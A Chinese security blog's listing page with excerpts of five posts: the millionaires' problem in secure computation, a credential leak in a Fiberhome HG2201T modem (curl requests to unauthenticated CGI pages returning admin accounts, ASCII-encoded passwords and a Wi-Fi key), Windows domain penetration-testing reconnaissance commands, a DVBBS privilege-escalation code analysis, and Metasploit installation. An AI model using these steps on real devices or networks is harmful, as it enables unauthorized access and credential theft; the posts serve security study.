多方安全计算 SMC

百万富翁问题 姚期智院士在 1982 年提出了百万富翁问题 两位百万富翁互相都不希望透露自己的财富的具体数值,如何比较谁更富有? 这个问题成为了多方安全计算起点。 秘密共享 不经意传输(oblivious transfer) 1981 年 Michael O.Rabin 首次提出这个概念。 下面用不经意传输来解决百万富翁问题,两位富翁分别叫做张三和李四,他们的财富数值抽象为 [1, 10] 的整数。 找 10 个一模一样的箱子,按照 1 ~ 10 的序号贴上标签,张三先按照自己的财富值分别往里面放入苹果梨和香蕉,具体放法为: 如果序号小于自己的财富之,放入苹果 相等,则放入梨, 大于自己的财富值,放入香蕉; 张三把 10 个盒子都叫上锁,这一过程对李四不可见。 李四根据自己的财富值对相应序号的箱子的再加一把锁;然后把所有标签除去。这一过程对张三不可见。 这样张三不知道李四选择的是第几个箱子,李四也不知道箱子里装的是什么。 张三李四分别开锁,看里面是什么水果: 如果是苹果,张三比李四富有; 如果是梨,两人一样有钱 如果是香蕉,李四比张三富有 参考: 百万富翁问题的一个简单解释 用密码学玩暗军棋 – 闲聊多方计算 [1] Yao, Andrew C. “Protocols for secure computations....

October 28, 2021 · 1 min · lyincc

电信光猫 - 烽火 HG2201T 敏感信息泄露

备份信息中可以泄露了超级密码,需要简单解密 curl http://192.168.1.1:8080/cgi-bin/login.htm.cgi # 管理后台 curl http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi # 备份信息 curl http://192.169.1.1:8080/cgi-bin/baseinfo.cgi # 设备信息 返回结果 { "RETURN": { "success": true }, "BASEINFOSET": { "baseinfoSet_INTERNETMAC": "XX:XX:XX:51:7C:C0", "baseinfoSet_TR069MAC": "XX:XX:XX:51:7c:c1", "baseinfoSet_VOIPMAC": "XX:XX:XX:51:7c:c2", "baseinfoSet_PRIPROTOCOLMAC": "XX:XX:XX:51:7c:c3", "baseinfoSet_WLANMAC": "XX:XX:XX:51:7c:cd", "baseinfoSet_PONMAC": "XX:XX:XX:51:7c:cf", "baseinfoSet_INTERNETEN": "1", "baseinfoSet_TR069EN": "1", "baseinfoSet_VOIPEN": "1", "baseinfoSet_PRIPROTOCOLEN": "1", "baseinfoSet_PONEN": "", "baseinfoSet_TELECOMACCOUNT": "telecomadmin", "baseinfoSet_TELECOMPASSWORD": "120&105&112&105&103&115&113&101&104&113&109&114&49&50&50&54&51&55&49&48&", "baseinfoSet_USERACCOUNT": "useradmin", "baseinfoSet_USERPASSWORD": "104&116&111&107&54&56&51&53&54&56&51&53&", "baseinfoSet_MANUFACTUREROUI": "XXXXXX", "baseinfoSet_DEVICESERIALNUMBER": "XXXXXX-3C846XXXXXX517CC0", "baseinfoSet_Compiletime": "23:36:36 Jan 25 2018", "baseinfoSet_SOFTWAREVERSION": "V1.00.M5002", "baseinfoSet_EXTNUMBER": "RP000000", "baseinfoSet_HARDWAREVERSION": "V2.1", "baseinfoSet_HARDWARECODE": "WKE7.200.400R1A", "baseinfoSet_SSID": "ChinaNet-Code", "baseinfoSet_WPAKEY": "JavaIsBest1024Code!...

July 5, 2018 · 2 min · lyincc

域渗透总结

Infomation Local Info Host 硬件信息,判断是否是虚拟机 系统信息,系统版本,补丁列表 wmic /node:10.0.0.133 computersystem get Name wmic bios wmic os wmic qfe# 补丁信息 wmic startup # 启动项 wmic baseboard # 主板信息 wmic computersystem wmic nicconfig # 网卡信息 systeminfo set # 环境变量 echo $env # 环境变量 系统信息 User 本地用户,权限 关注Administrator组成员和邮件用户。 密码、凭证、登入时间,登入机器 whoami /all qwinsta # 登入情况 qwinsta /SERVER:IP # net net user net user Administrator net localgroup net gourp net accounts # 密码策略 wmic /OUTPUT:out.txt /RECORD:out.xml /USER:Administrator /PASSWORD:P@ssw0rd!...

February 8, 2017 · 3 min · lyincc

DVBBS 7.X SP2 权限提升漏洞分析

漏洞分析 login.asp ChkUserLogin() Function ChkUserLogin(username,password,mobile,usercookies,ctype) ... ... 'Session(Dvbbs.CacheName & "UserID")用户资料=0dvbbs+1刷新时间+2发贴时间+3所在版面ID+4用户ID+5用户名+6用户密码+7用户邮箱+8用户文章数+9用户主题数+10用户性别+11用户头像+12用户头像宽+13用户头像高+14用户注册时间+15用户最后登陆时间+16用户登陆次数+17用户状态+18用户等级+19用户组ID+20用户组名+21用户金钱+22用户积分+23用户魅力+24用户威望+25用户生日+26最后登陆IP+27用户被删除数+28用户精华数+29用户隐身状态+30用户短信情况+31用户阳光会员+32用户手机+33用户组图标+34用户头衔+35验证密码+36用户今日信息+37+临时数据+38Dvbbs Sql="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday " Sql=Sql+" From [Dv_User] Where "&sqlstr&"" set rsUser=Dvbbs.Execute(sql) If rsUser.eof and rsUser.bof Then ChkUserLogin=false Exit Function Else iMyUserInfo=rsUser.GetString(,1, "|||", "", "") rsUser.Close:Set rsUser = Nothing End If iMyUserInfo = "Dvbbs|||"& Now & "|||" & Now &"|||"& Dvbbs.BoardID &"|||"& iMyUserInfo &"||||||Dvbbs" iMyUserInfo = Split(iMyUserInfo,"|||") If trim(password)<>trim(iMyUserInfo(6)) Then ChkUserLogin=false ElseIf iMyUserInfo(17)=1 Then ChkUserLogin=false ElseIf iMyUserInfo(19)=5 Then ChkUserLogin=false Else ChkUserLogin=True Session(Dvbbs....

February 5, 2017 · 2 min · lyincc

Metasploit Framework Installation on Debain 8

Metasploit Framework is a penetration test kit. Build it from source.

December 28, 2016 · 3 min · lyincc